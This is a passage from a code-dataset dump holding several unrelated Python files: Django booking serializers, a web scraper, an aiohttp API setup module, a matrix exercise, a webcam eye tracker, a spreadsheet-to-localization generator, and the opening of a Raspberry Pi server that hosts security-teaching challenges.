BookingChecklistCreateSerializer(serializers.Serializer):\n booking = serializers.PrimaryKeyRelatedField(queryset=Booking.objects.all(), required=True)\n item_list = serializers.ListField(child=BookingChecklistItemCreateSerializer())\n\n class Meta:\n validators = [ObjectUserValidator('booking', 'Booking')]\n\n def create(self, validated_data):\n booking = validated_data.get('booking')\n return bookingManager.create_checklist(booking, validated_data)\n\n\nclass PartQuoteNoteSerializer(DynamicFieldsModelSerializer):\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n class Meta:\n model = PartQuoteNote\n fields = '__all__'\n\n def to_representation(self, obj):\n self.fields['updated_by'] = UserSerializer(\n read_only=True,\n new_fields=['id', 'name', 'phone', 'ops_phone'])\n return super(PartQuoteNoteSerializer, self).to_representation(obj)\n\n\nclass BookingPartQuoteSerializer(DynamicFieldsModelSerializer):\n notes = PartQuoteNoteSerializer(many=True, required=False)\n\n class Meta:\n model = BookingPartQuote\n fields = '__all__'\n\n def to_representation(self, obj):\n if self.fields.get('vendor'):\n serializer_class = GenericModelSerializer\n serializer_class.Meta.model = PartVendor\n self.fields['vendor'] = serializer_class(new_fields=['id', 'name', 'city'])\n return super(BookingPartQuoteSerializer, self).to_representation(obj)\n\n def create(self, validated_data):\n notes = validated_data.pop('notes', [])\n instance = super(BookingPartQuoteSerializer, self).create(validated_data)\n for note in notes:\n #note['updated_by'] = validated_data.get('updated_by')\n note_obj = PartQuoteNote.objects.create(**note)\n instance.notes.add(note_obj)\n return instance\n\n def update(self, instance, validated_data):\n notes = validated_data.pop('notes', [])\n instance = super(BookingPartQuoteSerializer, self).update(instance, validated_data)\n for note in notes:\n #note['updated_by'] = validated_data.get('updated_by')\n note_obj = PartQuoteNote.objects.create(**note)\n instance.notes.add(note_obj)\n if instance.selected:\n booking_part = instance.booking_part_doc.booking_part\n booking_part.part_price = instance.price\n booking_part.save()\n return instance\n\n\nclass PartDocNoteSerializer(DynamicFieldsModelSerializer):\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n class Meta:\n model = PartDocNote\n fields = '__all__'\n\n def to_representation(self, obj):\n self.fields['updated_by'] = UserSerializer(\n read_only=True,\n new_fields=['id', 'name', 'phone', 'ops_phone'])\n return super(PartDocNoteSerializer, self).to_representation(obj)\n\n\nclass BookingPartDocSerializer(DynamicFieldsModelSerializer):\n notes = PartDocNoteSerializer(many=True, required=False)\n booking_part_quote = BookingPartQuoteSerializer(many=True, read_only=True)\n\n class Meta:\n model = BookingPartDoc\n fields = '__all__'\n\n def to_representation(self, obj):\n if self.fields.get('status'):\n status_serializer_class = GenericModelSerializer\n status_serializer_class.Meta.model = PartDocStatus\n self.fields['status'] = status_serializer_class(new_fields=['id', 'name'])\n self.fields['booking_part'] = BookingPackagePanelSerializer(\n read_only=True,\n new_fields=['id', 'panel_details'],\n change_serializer={\n 'panel_details': CarPanelPriceSerializer(\n source='panel',\n new_fields=['car_panel'],\n change_serializer={\n 'car_panel': CarPanelSerializer(\n 
new_fields=['name'])\n })\n })\n return super(BookingPartDocSerializer, self).to_representation(obj)\n\n def create(self, validated_data):\n notes = validated_data.pop('notes', [])\n instance = super(BookingPartDocSerializer, self).create(validated_data)\n for note in notes:\n # note['updated_by'] = validated_data.get('updated_by')\n note_obj = PartDocNote.objects.create(**note)\n instance.notes.add(note_obj)\n return instance\n\n def update(self, instance, validated_data):\n notes = validated_data.pop('notes', [])\n instance = super(BookingPartDocSerializer, self).update(instance, validated_data)\n for note in notes:\n # note['updated_by'] = validated_data.get('updated_by')\n note_obj = PartDocNote.objects.create(**note)\n instance.notes.add(note_obj)\n return instance\n\n\nclass BPPHistorySerializer(DynamicFieldsModelSerializer):\n # Booking package panel history serializer\n panel = CarPanelPriceSerializer(new_fields=['car_panel', 'type_of_work'],\n change_serializer={\n 'car_panel': CarPanelSerializer(\n new_fields=['name'])\n })\n\n class Meta:\n model = BookingPackagePanel.history.model\n fields = ('id', 'history_id', 'updated_at', 'created_at', 'booking_package', 'history_type',\n 'panel', 'part_price', 'material_price', 'labour_price')\n\n\nclass BookingExpectedEODSerializer(DynamicFieldsModelSerializer):\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n ops_status_details = BookingOpsStatusSerializer(source='ops_status',read_only=True)\n updated_by_details = UserSerializer(source='updated_by',\n read_only=True,\n new_fields=['id', 'name', 'email', 'phone', 'ops_phone'])\n\n class Meta:\n model = BookingExpectedEOD\n fields = ('__all__')\n","sub_path":"bumper2/api/serializers/bookingSerializers.py","file_name":"bookingSerializers.py","file_ext":"py","file_size_in_byte":68254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"549080882","text":"\"\"\"\nPython program that webscrapes dynamically: collects randomized dice-roll & timestamp, then reloads page and collects again.\n $ python3 realtime_scraper.py\n\"\"\"\nimport mechanicalsoup\nimport time # time.sleep(sec)\n\n\n\nbrowser = mechanicalsoup.Browser() # create headless web browser instance\nrolls = dict() #store dice-roll/timestamp\nfor i in range(4): # x4 dice rolls total\n page = browser.get(\"http://olympus.realpython.org/dice\") # open the webpage\n roll_tag = page.soup.select(\"#result\")[0] # find element with id=result (BeautifulSoup object's .select() method).\n result = roll_tag.text\n timestamp_tag = page.soup.select(\"#time\")[0] # find element with id=time\n timestamp = timestamp_tag.text # get timestamp text only\n print(f\"The result of the {timestamp} dice roll is {result}.\")\n rolls[timestamp] = result # add: dict[key] = value\n if i < 3: time.sleep(2) # pause 2 sec after each roll (not after last roll!)\n\nprint(rolls) # print the dictionary\n","sub_path":"WebScrape/realtime_scraper.py","file_name":"realtime_scraper.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"137667671","text":"\"\"\" Restful API\n\n - Loads and validates openapi specifications (oas)\n - Adds check and diagnostic routes\n - Activates middlewares\n\n\"\"\"\nimport asyncio\nimport logging\n#from copy import deepcopy\n\nfrom aiohttp import web\nfrom tenacity import before_sleep_log, retry, 
stop_after_attempt, wait_fixed\n\nfrom servicelib import openapi\nfrom servicelib.application_keys import APP_CONFIG_KEY\nfrom servicelib.openapi import create_openapi_specs\nfrom servicelib.rest_middlewares import append_rest_middlewares\n\nfrom . import rest_routes\nfrom .rest_config import APP_OPENAPI_SPECS_KEY, CONFIG_SECTION_NAME\n\nlog = logging.getLogger(__name__)\n\n\nRETRY_WAIT_SECS = 2\nRETRY_COUNT = 20\nCONNECT_TIMEOUT_SECS = 30\n\n\ndef get_server(servers, url):\n # Development server: http://{host}:{port}/{basePath}\n for server in servers:\n if server.url == url:\n return server\n raise ValueError(\"Cannot find server %s in openapi specs\" % url)\n\n\n@retry( wait=wait_fixed(RETRY_WAIT_SECS),\n stop=stop_after_attempt(RETRY_COUNT),\n before_sleep=before_sleep_log(log, logging.INFO) )\nasync def get_specs(location):\n specs = await create_openapi_specs(location)\n return specs\n\n\ndef setup(app: web.Application, *, debug=False):\n log.debug(\"Setting up %s %s...\", __name__, \"[DEBUG]\" if debug else \"\")\n\n # main_cfg = app[APP_CONFIG_KEY][\"main\"]\n cfg = app[APP_CONFIG_KEY][CONFIG_SECTION_NAME]\n\n try:\n #specs = await create_openapi_specs(location=cfg[\"location\"])\n loop = asyncio.get_event_loop()\n location = cfg[\"location\"]\n specs = loop.run_until_complete( get_specs(location) )\n\n # TODO: tmp removed but keep in case ...\n # sets servers variables to current server's config\n # extra_api_urls = cfg.get(\"extra_urls\", list())\n # if debug:\n # for host in {'127.0.0.1', 'localhost', main_cfg['host'] }:\n # for port in {9081, main_cfg['port']}:\n # extra_api_urls.append(\"http://{}:{}\".format(host, port))\n\n # server = get_server(specs.servers, \"{publicUrl}/{basePath}\")\n # for url in extra_api_urls:\n # new_server = deepcopy(server)\n # new_server.variables['publicUrl'].default = url\n # specs.servers.append(new_server)\n\n\n # TODO: What if many specs to expose? v0, v1, v2 ... perhaps a dict instead?\n # TODO: should freeze specs here??\n app[APP_OPENAPI_SPECS_KEY] = specs # validated openapi specs\n\n\n # diagnostics routes\n routes = rest_routes.create(specs)\n app.router.add_routes(routes)\n\n # middlewares\n base_path = openapi.get_base_path(specs)\n version = cfg[\"version\"]\n assert \"/\"+version == base_path, \"Expected %s, got %s\" %(version, base_path)\n append_rest_middlewares(app, base_path)\n\n except openapi.OpenAPIError:\n # TODO: protocol when some parts are unavailable because of failure\n # Define whether it is critical or this server can still\n # continue working offering partial services\n log.exception(\"Invalid rest API specs. 
Rest API is DISABLED\")\n\n# alias\nsetup_rest = setup\n\n__all__ = (\n 'setup_rest'\n)\n","sub_path":"services/web/server/src/simcore_service_webserver/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
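The rest.py record above polls for its OpenAPI specs with a tenacity-decorated coroutine (wait_fixed, stop_after_attempt, before_sleep_log). A minimal synchronous sketch of that retry pattern; flaky_fetch and its failure counter are hypothetical stand-ins for create_openapi_specs:

import logging
from tenacity import retry, stop_after_attempt, wait_fixed, before_sleep_log

log = logging.getLogger(__name__)
attempts = {"n": 0}

@retry(wait=wait_fixed(0.1),           # pause 0.1 s between tries
       stop=stop_after_attempt(5),     # give up after 5 tries
       before_sleep=before_sleep_log(log, logging.INFO))
def flaky_fetch():
    attempts["n"] += 1
    if attempts["n"] < 3:
        raise ConnectionError("not ready yet")
    return "specs"

print(flaky_fetch())  # succeeds on the 3rd call

before_sleep_log logs each failed attempt before the fixed pause, which is how the server surfaces transient startup failures without crashing.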
+{"seq_id":"271169461","text":"class Matrix:\n def __init__(self, matrix):\n self.matrix = matrix\n\n def __str__(self):\n return '\\n'.join([''.join(['{:3}'.format(column) for column in row]) for row in self.matrix])\n\n def __add__(self, other):\n return Matrix([[self.matrix[row][column] + other.matrix[row][column] for column in range(len(self.matrix[row]))]\n for row in range(len(self.matrix))])\n\n\ndef sum_res(*args):\n plus = [[\"\", \"+\"] if r == 1 else [\"\", \"\"] for r in range(len(args[0]))]\n equal = [[\"\", \"=\"] if r == 1 else [\"\", \"\"] for r in range(len(args[0]))]\n to_return = []\n rows = []\n\n for row in range(len(args[0])):\n for arg in range(len(args)):\n rows.extend(args[arg][row])\n if arg < len(args) - 2:\n rows.extend(plus[row])\n elif arg == len(args) - 2:\n rows.extend(equal[row])\n to_return.append(rows.copy())\n rows.clear()\n\n return to_return\n\n\n# Example 1: 3x2 matrices\nmatrix1 = Matrix([[2, 3], [4, 1], [7, 9]])\nmatrix2 = Matrix([[9, 1], [11, 2], [13, 8]])\nprint(f'Sum of 3x2 matrices: \\n{Matrix(sum_res(matrix1.matrix, matrix2.matrix, (matrix1 + matrix2).matrix))}',\n end=\"\\n\\n\")\n\n# Example 2: 3x3 matrices\nmatrix1 = Matrix([[1, 2, 3], [3, 4, 1], [6, 7, 9]])\nmatrix2 = Matrix([[8, 9, 1], [10, 11, 2], [12, 13, 8]])\nprint(f'Sum of 3x3 matrices: \\n{Matrix(sum_res(matrix1.matrix, matrix2.matrix, (matrix1 + matrix2).matrix))}',\n end=\"\\n\\n\")\n\n# Example 3: 2x4 matrices\nmatrix1 = Matrix([[1, 2, 3, 6], [3, 4, 1, 9]])\nmatrix2 = Matrix([[8, 9, 1, 12], [10, 11, 2, 8]])\nprint(f'Sum of 2x4 matrices: \\n{Matrix(sum_res(matrix1.matrix, matrix2.matrix, (matrix1 + matrix2).matrix))}',\n end=\"\\n\\n\")\n","sub_path":"Lesson7/Lesson7_Ex_1.py","file_name":"Lesson7_Ex_1.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"433160633","text":"import cv2\r\nimport time\r\n\r\nscale = 2\r\ncap = cv2.VideoCapture(0)\r\n\r\nlist_eye_location = []\r\nhistory_eye_locations = []\r\nisDraw = True\r\n\r\nblack = cv2.imread('./black.png')\r\nadv = cv2.imread('./adv.jpg')\r\n\r\nTIMER = int(15)\r\n# SET THE COUNTDOWN TIMER\r\n# for simplicity we set it to 15\r\n# We can also take this as input\r\n\r\n# Open the camera\r\ndef eye_tracking(ret, frame):\r\n\r\n height, width, channels = frame.shape\r\n\r\n centerX, centerY = int(height / 2), int(width / 2)\r\n radiusX, radiusY = int(scale * height / 100), int(scale * width / 100)\r\n\r\n minX, maxX = centerX - radiusX, centerX + radiusX\r\n minY, maxY = centerY - radiusY, centerY + radiusY\r\n\r\n cropped = frame[minX:maxX, minY:maxY]\r\n resized_cropped = cv2.resize(cropped, (width, height))\r\n\r\n roi = resized_cropped\r\n roi = cv2.flip(roi, 1)\r\n rows, cols, _ = roi.shape\r\n gray_roi = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\r\n gray_roi = cv2.GaussianBlur(gray_roi, (7, 7), 0)\r\n\r\n _, threshold = cv2.threshold(gray_roi, 28, 255, cv2.THRESH_BINARY_INV)\r\n contours, _ = cv2.findContours(threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n contours = sorted(contours, key=lambda x: cv2.contourArea(x), reverse=True)\r\n\r\n temp = cv2.addWeighted(roi, 0, black, 100, 0)\r\n advImg = cv2.add(temp, adv)\r\n\r\n for cnt in contours:\r\n (x, y, w, h) = cv2.boundingRect(cnt)\r\n cenX = int((x + (x + w)) / 2)\r\n cenY = int((y + (y + h)) / 2)\r\n cv2.circle(advImg, (cenX, cenY), 10, (0, 255, 0), -1)\r\n\r\n break\r\n\r\n return threshold, gray_roi, advImg\r\n\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n\r\n # Read and display each frame\r\n ret, frame = cap.read()\r\n\r\n # Call the eye-tracking function\r\n threshold, gray_roi, advImg = eye_tracking(ret, frame)\r\n\r\n cv2.imshow(\"Bin\", threshold)\r\n cv2.imshow(\"Gray ROI\", gray_roi)\r\n cv2.imshow(\"Eye tracking\", advImg)\r\n\r\n # check for the key pressed\r\n k = cv2.waitKey(125)\r\n\r\n # set the key for the countdown\r\n # to begin. Here we set q\r\n # if key pressed is q\r\n if k == ord('q'):\r\n prev = time.time()\r\n\r\n while TIMER > 0:\r\n ret, frame = cap.read()\r\n\r\n # Call the eye-tracking function\r\n threshold, gray_roi, advImg = eye_tracking(ret, frame)\r\n\r\n # Display countdown on each frame\r\n # specify the font and draw the\r\n # countdown using puttext\r\n font = cv2.FONT_HERSHEY_SIMPLEX\r\n cv2.putText(advImg, str(TIMER), (550, 50), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 0), 3)\r\n cv2.imshow(\"Bin\", threshold)\r\n cv2.imshow(\"Gray ROI\", gray_roi)\r\n cv2.imshow(\"Eye tracking\", advImg)\r\n cv2.waitKey(125)\r\n\r\n # current time\r\n cur = time.time()\r\n\r\n # Update and keep track of Countdown\r\n # if time elapsed is one second\r\n # then decrease the counter\r\n if cur - prev >= 1:\r\n prev = cur\r\n TIMER = TIMER - 1\r\n\r\n # else:\r\n # ret, frame = cap.read()\r\n #\r\n # # Display the clicked frame for 2\r\n # # sec. You can increase time in\r\n # # waitKey also\r\n # cv2.imshow(\"Bin\", threshold)\r\n # cv2.imshow(\"Gray ROI\", gray_roi)\r\n # cv2.imshow(\"Eye tracking\", whiteImg)\r\n #\r\n # # time for which image displayed\r\n # cv2.waitKey(2000)\r\n #\r\n # # Save the frame\r\n # #cv2.imwrite('camera.jpg', img)\r\n #\r\n # # HERE we can reset the Countdown timer\r\n # # if we want more Capture without closing\r\n # # the camera\r\n\r\n # Press Esc to exit\r\n elif k == 27:\r\n break\r\n\r\n# close the camera\r\ncap.release()\r\n\r\n# close all the opened windows\r\ncv2.destroyAllWindows()","sub_path":"Gaze detection/adv_Countdown.py","file_name":"adv_Countdown.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
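The adv_Countdown.py record above locates the pupil by blurring a grayscale ROI, inverse-thresholding it so dark pixels become a white blob, and taking the bounding-box centre of the largest contour. The same pipeline on a synthetic frame, so it runs without a webcam; the image and values here are illustrative only:

import cv2
import numpy as np

# Synthetic "eye": light background with one dark disc (the pupil stand-in).
frame = np.full((120, 160, 3), 200, dtype=np.uint8)
cv2.circle(frame, (80, 60), 12, (10, 10, 10), -1)

gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (7, 7), 0)
# THRESH_BINARY_INV turns dark pixels white, so the pupil becomes a blob.
_, thresh = cv2.threshold(gray, 28, 255, cv2.THRESH_BINARY_INV)
contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)

x, y, w, h = cv2.boundingRect(contours[0])
print("pupil centre:", (x + w // 2, y + h // 2))  # approximately (80, 60)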
+{"seq_id":"633808853","text":"#!/usr/bin/python\n\n# Copyright (c) 2019 Roman Gille, http://romangille.com\n\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to\n# the following conditions:\n\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE\n# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\n# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION\n# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nimport urllib.request\nimport json\nimport os\nimport re\nimport xml.etree.ElementTree as xml\nfrom xml.dom import minidom\n\nplaceholderPattern = re.compile(r'{String([0-9]*)}|{Number([0-9]*)}')\nscriptRunPath = os.getcwd()\nscriptFileName = os.path.basename(__file__)\nconfigFileName = os.path.splitext(scriptFileName)[0] + \".config.json\"\n\nl10nCommentIdentifier = \"//\"\nl10nSectionTitleIdentifier = \"// -\"\nl10nLineFormat = \"\\\"%s\\\" = \\\"%s\\\";\\n\"\n\ndef parseDocument(spreadsheetId, sheetIndex):\n sheetUrl = \"https://spreadsheets.google.com/feeds/cells/\"+ spreadsheetId +\"/\"+ str(sheetIndex) +\"/public/full?alt=json\"\n \n print(\"Loading JSON from %s.\" % sheetUrl)\n\n with urllib.request.urlopen(sheetUrl) as response:\n content = response.read()\n parsed_json = json.loads(content)\n\n entries = parsed_json['feed']['entry']\n rows = {}\n\n for entry in entries:\n cellInfo = entry['gs$cell']\n row = int(cellInfo['row'])\n rows[row] = {}\n\n print(\"Found %i rows.\" % (len(rows) - 1))\n # print(json.dumps(rows, indent=4, sort_keys=True))\n\n for entry in entries:\n cellInfo = entry['gs$cell']\n row = int(cellInfo['row'])\n col = int(cellInfo['col'])\n cellContent = entry['content']['$t']\n rows[row][col] = cellContent\n\n return rows\n\ndef writeLocalizations(rows, configuration):\n languageCount = max(rows[1].keys()) - 1\n print(\"Found %i languages.\" % languageCount)\n\n for languageColumn in range(2, 2 + languageCount):\n languageKey = rows[1][languageColumn].replace(\" \", \"\")\n \n if configuration[\"os\"] == \"iOS\":\n buildLocalizationIOS(rows, languageColumn, languageKey, configuration)\n \n if configuration[\"os\"] == \"Android\":\n buildLocalizationAndroid(rows, languageColumn, languageKey, configuration)\n\ndef buildLocalizationIOS(rows, column, languageKey, configuration):\n\n # Prepare paths.\n baseLanguage = \"en\" if (configuration[\"baseLanguage\"] is None) else configuration[\"baseLanguage\"]\n languageFolderName = \"Base\" if (languageKey == baseLanguage) else languageKey\n folderPath = configuration[\"outputFolder\"] + \"/\" + languageFolderName + \".lproj\"\n fileName = configuration[\"fileName\"] + \".strings\"\n filePath = folderPath + \"/\" + fileName\n\n # Prepare file.\n outputFile = startFile(folderPath, filePath, fileName)\n l10nWriteHeaderComment(fileName, outputFile)\n\n for row in rows:\n # Skip first row and rows without first column.\n if row == 1 or 1 not in rows[row]:\n continue\n\n key = rows[row][1]\n # Add section comment.\n if key.startswith(l10nSectionTitleIdentifier):\n l10nWriteSectionComment(key, outputFile)\n continue\n\n # Skip empty translations...\n if column not in rows[row]:\n # ...but check if the key is a comment first.\n if key.startswith(l10nCommentIdentifier):\n l10nWriteComment(key, outputFile)\n continue\n\n translation = placeholderPattern.sub(\"%@\", rows[row][column])\n line = \"\\\"%s\\\" = \\\"%s\\\";\" % (key, translation)\n # Check if the line is commented.\n if key.startswith(l10nCommentIdentifier):\n l10nWriteComment(line, outputFile)\n continue\n\n # Write line.\n outputFile.write(\"%s\\n\" % line)\n\n outputFile.close()\n print(\"Generated \" + filePath + \".\")\n\ndef buildLocalizationAndroid(rows, column, languageKey, configuration):\n\n # 
Prepare paths.\n isBaseLanguage = (configuration[\"baseLanguage\"] == languageKey)\n languageFolderName = \"values\" if isBaseLanguage else \"values-\" + languageKey\n folderPath = configuration[\"outputFolder\"] + \"/\" + languageFolderName\n fileName = configuration[\"fileName\"] + \".xml\"\n filePath = folderPath + \"/\" + fileName\n\n strings = []\n\n for row in rows:\n # Skip first row and rows without first column.\n if row == 1 or 1 not in rows[row]:\n continue\n\n key = rows[row][1]\n if key.startswith(l10nSectionTitleIdentifier):\n strings.append({key: \"\"})\n continue\n # Skip comments.\n if key.startswith(l10nCommentIdentifier):\n continue\n strings.append({key: placeholderPattern.sub(\"%s\", rows[row][column])})\n\n outputFile = startFile(folderPath, filePath, fileName)\n outputFile.write(buildResourceXML(strings, \"string\"))\n outputFile.close()\n print(\"Generated \" + filePath + \".\")\n\ndef writeColors(rows, configuration):\n\n isAndroid = (configuration[\"os\"] == \"Android\")\n fileExtension = \".xml\" if isAndroid else \".json\"\n folderPath = configuration[\"outputFolder\"]\n fileName = configuration[\"fileName\"] + fileExtension\n filePath = folderPath + \"/\" + fileName\n\n colors = []\n\n for row in rows:\n # Skip first row and rows without first column.\n if row == 1 or 1 not in rows[row]:\n continue\n\n key = rows[row][1]\n hexValue = rows[row][2]\n colors.append({key: hexValue})\n\n outputFile = startFile(folderPath, filePath, fileName)\n\n if isAndroid:\n outputFile.write(buildResourceXML(colors, \"color\"))\n else:\n jsonDict = {}\n for item in colors:\n key = next(iter(item))\n jsonDict[key] = item[key]\n json.dump(jsonDict, outputFile)\n \n\n outputFile.close()\n print(\"Generated \" + filePath + \".\")\n\ndef buildResourceXML(keyValueArray, elementName):\n root = xml.Element(\"resources\")\n root.insert(0, xml.Comment(\"Generated with \" + scriptFileName))\n itemCount = 0\n\n for item in keyValueArray:\n key = next(iter(item))\n if key.startswith(l10nSectionTitleIdentifier):\n # Add comment.\n root.insert(itemCount, xml.Comment(xmlWriteSectionComment(key)))\n continue\n # Add line.\n xml.SubElement(root, elementName, name=key).text = item[key]\n itemCount += 1\n\n xmlString = xml.tostring(root)\n return minidom.parseString(xmlString).toprettyxml()\n\ndef startFile(folderPath, filePath, fileName, binary=False):\n\n os.makedirs(folderPath, exist_ok=True)\n fileHandler = open(filePath, \"wb\" if (binary) else \"w\")\n return fileHandler\n\n# Comment helper.\n\ndef l10nWriteComment(comment, fileHandler):\n\n fileHandler.write(\"/* %s */\\n\" % comment.replace(l10nCommentIdentifier, \"\"))\n\ndef l10nWriteHeaderComment(fileName, fileHandler):\n\n fileHandler.write(\"/*\\n \" + fileName + \"\\n Generated with \" + scriptFileName + \".\\n*/\\n\\n\")\n\ndef l10nWriteSectionComment(sectionTitle, fileHandler):\n\n fileHandler.write(\"\\n/*\\n Section: %s\\n*/\\n\" % sectionTitle.replace(l10nSectionTitleIdentifier, \"\").replace(\" \", \"\"))\n\ndef xmlWriteSectionComment(sectionTitle):\n\n return \"Section: %s\" % sectionTitle.replace(l10nSectionTitleIdentifier, \"\").replace(\" \", \"\")\n\n# Run.\n\ndef run(config):\n\n sheetId = config[\"sheetId\"]\n\n for l10nConfig in config[\"l10n\"]:\n tableData = parseDocument(sheetId, l10nConfig[\"sheetNumber\"])\n writeLocalizations(tableData, l10nConfig)\n\n for colorConfig in config[\"colors\"]:\n tableData = parseDocument(sheetId, colorConfig[\"sheetNumber\"])\n writeColors(tableData, colorConfig)\n\ndef main():\n # 
Parse config file and run tasks.\n try:\n with open(configFileName, 'r') as stream:\n config = json.load(stream)\n run(config)\n\n except json.JSONDecodeError as exc:\n print(\"Error parsing config file: \")\n print(exc)\n\n except FileNotFoundError:\n print(\"Error: Could not find \\\"\" + configFileName + \"\\\". This should be placed at the run directory of this script. Current run directory is \\\"\" + scriptRunPath +\"\\\".\")\n\n# This will get called when the file is called via `python filename.py`\nif __name__ == '__main__':\n main()\n","sub_path":"Sources/data_sync.py","file_name":"data_sync.py","file_ext":"py","file_size_in_byte":9011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"355436037","text":"\"\"\" Server for RaspberryPi (Python 3.6)\r\n\r\nThis is a server written during the internship with Dr. Charles Morisset, Newcastle University.\r\nIts purpose is to teach security in a live but safe environment, with the help of Raspberry Pi.\r\n\r\nAuthor: Kacper Florianski\r\n\r\n=== Usage ===\r\n\r\nRun $ python server.py where python refers to version 3.6. From that moment you can connect to the server\r\nby specifying Pi's ethernet IP and port (defaults to 50000).\r\n\r\nOnce running, the server should never stop listening to incoming connections; however, it will only accept 1 at a time.\r\n\r\nRaspberry Pi should run the server on startup; if you have access to the Pi's console you can check whether it's running\r\nby typing $ ps aux | grep python and looking for a process with server.py in its name.\r\n\r\n=== Adding your own challenge ===\r\n\r\nYou can make your own challenge with the help of methods and variables existing in the server. There are some rules:\r\n\r\n - you have to create a separate folder for your challenge, with a unique name\r\n - you have to provide a Python module called 'main' (ex. module main in folder reverse)\r\n - you have to develop a single python function that can be called from the server (the function can call other scripts)\r\n - the function mentioned has to have the same name as the module (ex. function main in module main in folder reverse)\r\n - the function mentioned has to take EXACTLY 2 arguments - server and command data (ex. main(server, data))\r\n - your function should implement the usage of help argument\r\n\r\nIf the following requirements are met, the server will automatically add a command and use provided files.\r\n\r\nIn your challenge you can access:\r\n\r\n - cache variable, it's a python dictionary where you can store information required for your challenge\r\n - send(data) method, which sends a message (string) to the connected client\r\n\r\nWhile it is not possible to restrict access to other variables or methods, I do not encourage using them.\r\n\r\nPlease refer to the template files for additional guidance regarding making your own challenge, including good practice.\r\nTemplates can be found in the templates folder.\r\n\r\n=== Example ===\r\n\r\nLet's say a client connects to the Pi and enters the following commands in the given order:\r\n\r\nInput: Hello\r\nOutput: Invalid command. 
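The rules above pin down the plug-in contract: a uniquely named folder, a module called main, and a main(server, data) function that honours a help argument. A hypothetical challenge folder echo/ (my own example, not one of the shipped templates) could therefore be as small as:

# echo/main.py -- hypothetical example challenge, not part of the server.
def main(server, data):
    # data is the full command split on spaces, e.g. ["!echo", "help"]
    if len(data) > 1 and data[1] == "help":
        server.send("!echo <text> - sends <text> back to you\r\n")
        return
    # Remember how often this client used the command (cache lasts one connection).
    server.cache["echo_count"] = server.cache.get("echo_count", 0) + 1
    server.send(" ".join(data[1:]) + "\r\n")

Because the folder, module, and function all follow the naming rules, the server's build() step registers this as the !echo command automatically.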
Type !help to display available commands.\r\n\r\nInput: !help\r\nOutput: Here are the available commands:\r\n - !help\r\n - !reverse_programming\r\nTo learn more about each command, type help.\r\nTo add arguments to a command, type (...)\r\n\r\nInput: !reverse_programming help\r\nOutput: !reverse_programming - starts the programming challenge\r\n!reverse_programming - checks the answer of the programming challenge\r\n!reverse_programming no_key - starts the previous challenge, but with an unknown key of length 5\r\n!reverse_programming no_key - checks the answer of the no_key challenge\r\n\r\nNote that \"!reverse_programming help\" command had to be coded within the reverse function, and used the data argument to\r\nachieve desired functionality (precisely, in that case data = [\"!reverse_programming\", \"help\"])\r\n\"\"\"\r\n\r\nfrom os import listdir, path\r\nfrom importlib import import_module\r\nimport socket\r\n\r\n\r\n# TODO: Add docs of each element\r\nclass Server:\r\n\r\n def __init__(self, *, host_ip='0.0.0.0', port=50000):\r\n\r\n # Save the host and port information\r\n self.host_ip = host_ip\r\n self.port = port\r\n\r\n # Initialise the socket for IPv4 addresses (hence AF_INET) and TCP (hence SOCK_STREAM)\r\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n try:\r\n # Bind the socket to the given address\r\n self.socket.bind((self.host_ip, self.port))\r\n except socket.error as e:\r\n print(\"Failed to bind socket to the given ip and port - \" + str(e))\r\n\r\n # Tell the server to listen to only one connection\r\n self.socket.listen(1)\r\n\r\n # Initialise client information\r\n self.client_socket = None\r\n self.client_address = None\r\n self.client_ip = None\r\n\r\n # Initialise possible commands, add hardcoded help method\r\n self.commands = {\r\n \"!help\": self.help,\r\n }\r\n\r\n # Create an empty dictionary to let the challenge creators store important information\r\n self.cache = {}\r\n\r\n # Build the commands for all properly prepared file structures\r\n self.build()\r\n\r\n def build(self):\r\n\r\n # Get the path to current (root) directory\r\n root = path.normpath(path.dirname(__file__))\r\n\r\n # Retrieve immediate child directories of root directory\r\n directories = [child for child in listdir(root) if path.isdir(path.join(root, child))]\r\n\r\n # Iterate over each sub-folder\r\n for directory in directories:\r\n\r\n 